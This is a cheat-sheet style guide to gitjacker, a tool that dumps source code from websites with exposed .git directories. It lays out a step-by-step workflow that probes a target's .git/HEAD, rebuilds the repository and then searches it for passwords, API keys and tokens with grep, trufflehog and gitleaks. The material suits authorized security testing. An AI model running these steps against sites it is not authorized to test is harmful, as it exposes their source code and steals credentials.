Description
gitjacker extracts source code from websites with exposed .git directories. When a web server accidentally exposes the .git folder, gitjacker reconstructs the full repository including all files, commit history, and potentially sensitive configuration files and secrets.
Installation
BASH
# Using Go
go install github.com/liamg/gitjacker@latest
# Binary from releases
# https://github.com/liamg/gitjacker/releasesBasic Usage
BASH
# Dump exposed git repository
gitjacker https://target.com/.git/
# Output to directory
gitjacker https://target.com/.git/ -o ./dumped_repo/Advanced Usage
BASH
# Verbose output
gitjacker https://target.com/.git/ -v
# Custom output directory
gitjacker https://target.com/.git/ -o /tmp/target_source/
# After dumping, extract secrets
cd /tmp/target_source/
git log --all --oneline # View commit history
git diff HEAD~10 HEAD # Check recent changes for secrets
grep -r "password\|secret\|api_key\|token" . --include="*.py" --include="*.js" --include="*.php"Common Workflows
BASH
# Step 1: Check if .git is exposed
curl -s https://target.com/.git/HEAD
# Should return: ref: refs/heads/main (or master)
# Step 2: Dump the repo
gitjacker https://target.com/.git/ -o ./dumped/
# Step 3: Analyze for secrets
cd dumped/
trufflehog filesystem .
gitleaks detect -s .
# Step 4: Review commit history for sensitive data
git log --all --diff-filter=D --summary # Find deleted files
git log --all -p -- "*.env" "*.config" "*password*"